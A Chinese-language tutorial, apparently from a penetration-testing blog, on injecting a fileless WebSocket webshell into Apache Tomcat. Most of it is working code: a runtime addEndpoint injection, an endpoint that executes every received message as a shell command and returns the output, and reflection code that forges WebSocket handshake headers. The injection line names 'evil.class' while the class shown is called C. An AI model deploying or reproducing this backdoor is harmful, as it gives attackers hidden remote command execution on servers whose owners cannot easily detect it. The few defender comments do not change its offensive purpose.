tomcat websocket内存马
目录
addEndpoint 注入内存
WebSocket 内存马是一种较新的内存马：它通过 Tomcat 的 `ServerContainer.addEndpoint` 方法在运行时把一个 WebSocket 端点注册进 JVM 内存，磁盘上不落任何文件（因此重启或重新部署后即消失）。注入过程也比较简单。
恶意类可以这样被植入到内存中
// JSR-356 exposes the container's ServerContainer as a ServletContext attribute keyed by
// the ServerContainer class name; grab it from the current request's context.
ServerContainer container = (ServerContainer) req.getServletContext().getAttribute(ServerContainer.class.getName());
// Programmatic deployment of the endpoint class on path "/ws". No annotation scanning is
// involved, so it works from code compiled after the webapp started (e.g. from a JSP).
// NOTE(review): Tomcat normally permits addEndpoint() after the first handshake; with the
// system property org.apache.tomcat.websocket.noAddAfterHandshake=true (strict spec
// compliance) the call is rejected with a DeploymentException -- verify for your version.
// Defenders: nothing is written to web.xml or the class path; the endpoint exists only in
// the ServerContainer's runtime registry, which is where hunting for it has to look.
container.addEndpoint(ServerEndpointConfig.Builder.create(evil.class, "/ws").build());
恶意类如下：连接建立时 `onOpen` 把自身注册为该会话的消息处理器，此后客户端发来的每一条文本消息都在 `onMessage` 中被当作系统命令执行，命令输出通过同一个 session 回传。
/**
 * Endpoint body of the WebSocket memory shell: after the handshake, every text frame a
 * client sends is executed as an OS command and the command's standard output is written
 * back on the same session.
 *
 * NOTE(review): only stdout is read, so a child that writes a lot to stderr can fill its
 * pipe and block before waitFor() returns; and each output byte is widened to a char,
 * which mangles any non-ASCII (multi-byte) output. Both are kept as-is here.
 */
public static class C extends Endpoint implements MessageHandler.Whole<String> {
    /** Session captured in onOpen and reused by onMessage to send results. */
    private Session session;

    /**
     * Handshake callback: remember the session and register this object as the
     * whole-text-message handler for it.
     */
    @Override
    public void onOpen(final Session session, EndpointConfig config) {
        this.session = session;
        session.addMessageHandler(this);
    }

    /**
     * Runs the incoming text frame as a shell command line (cmd.exe /c on Windows,
     * /bin/bash -c elsewhere), waits for the child, then sends its stdout back.
     * Any failure is only printed; nothing is reported to the peer.
     */
    @Override
    public void onMessage(String command) {
        try {
            String[] argv = isWindows()
                    ? new String[] { "cmd.exe", "/c", command }
                    : new String[] { "/bin/bash", "-c", command };
            Process child = Runtime.getRuntime().exec(argv);

            // Drain the child's stdout byte by byte until EOF.
            InputStream stdout = child.getInputStream();
            StringBuilder output = new StringBuilder();
            for (int b = stdout.read(); b != -1; b = stdout.read()) {
                output.append((char) b);
            }
            stdout.close();

            child.waitFor();
            session.getBasicRemote().sendText(output.toString());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /** True when os.name starts with "windows" (case-insensitive). */
    private static boolean isWindows() {
        return System.getProperty("os.name").toLowerCase().startsWith("windows");
    }
}
植入后的触发逻辑
注解
也可以通过 `@ServerEndpoint` 注解来声明 WebSocket 端点，但带注解的类只会在 Web 应用启动时由 Tomcat 的 ServletContainerInitializer 扫描并注册；实际渗透中我们往往是上传 JSP，JSP 在运行时才被编译，其中的类不会再被扫描到。所以这个方法了解一下即可。
@ServerEndpoint(value = "/websocket")
手动升级（无需注入端点）：通过反射直接改写 Tomcat 内部的请求头表，把当前这个普通 HTTP 请求伪装成 WebSocket 握手请求。
/**
 * Replaces (or creates) a request header by writing straight into Tomcat's internal
 * header table, bypassing the read-only servlet API.
 *
 * The walk is RequestFacade.request -> catalina Request.coyoteRequest -> coyote
 * Request.headers (a MimeHeaders). Every lookup uses getDeclaredField on the object's
 * runtime class, so it only works when {@code request} is Tomcat's own facade and not a
 * wrapper. Any reflection failure is printed and otherwise ignored.
 *
 * @param request the servlet request whose underlying header table is modified
 * @param key     header name; an existing header of that name is removed first
 * @param value   header value to set
 */
private void SetHeader(HttpServletRequest request, String key, String value){
    Class<? extends HttpServletRequest> facadeClass = request.getClass();
    try {
        Field facadeRequestField = facadeClass.getDeclaredField("request");
        facadeRequestField.setAccessible(true);
        Object catalinaRequest = facadeRequestField.get(request);

        Object coyoteRequest = readPrivateField(catalinaRequest, "coyoteRequest");
        MimeHeaders headers = (MimeHeaders) readPrivateField(coyoteRequest, "headers");

        // Remove-then-add so the new value is the only one under this name.
        headers.removeHeader(key);
        headers.addValue(key).setString(value);
    } catch (Exception e) {
        e.printStackTrace();
    }
}

/** Reads a private field declared on the target's runtime class. */
private static Object readPrivateField(Object target, String name) throws ReflectiveOperationException {
    Field field = target.getClass().getDeclaredField(name);
    field.setAccessible(true);
    return field.get(target);
}
// Stamp the RFC 6455 opening-handshake headers onto the current request. The three calls
// are independent of each other; each one replaces any existing header of that name.
SetHeader(request, "Upgrade", "websocket");
SetHeader(request, "Connection", "upgrade");
SetHeader(request, "Sec-WebSocket-Version", "13");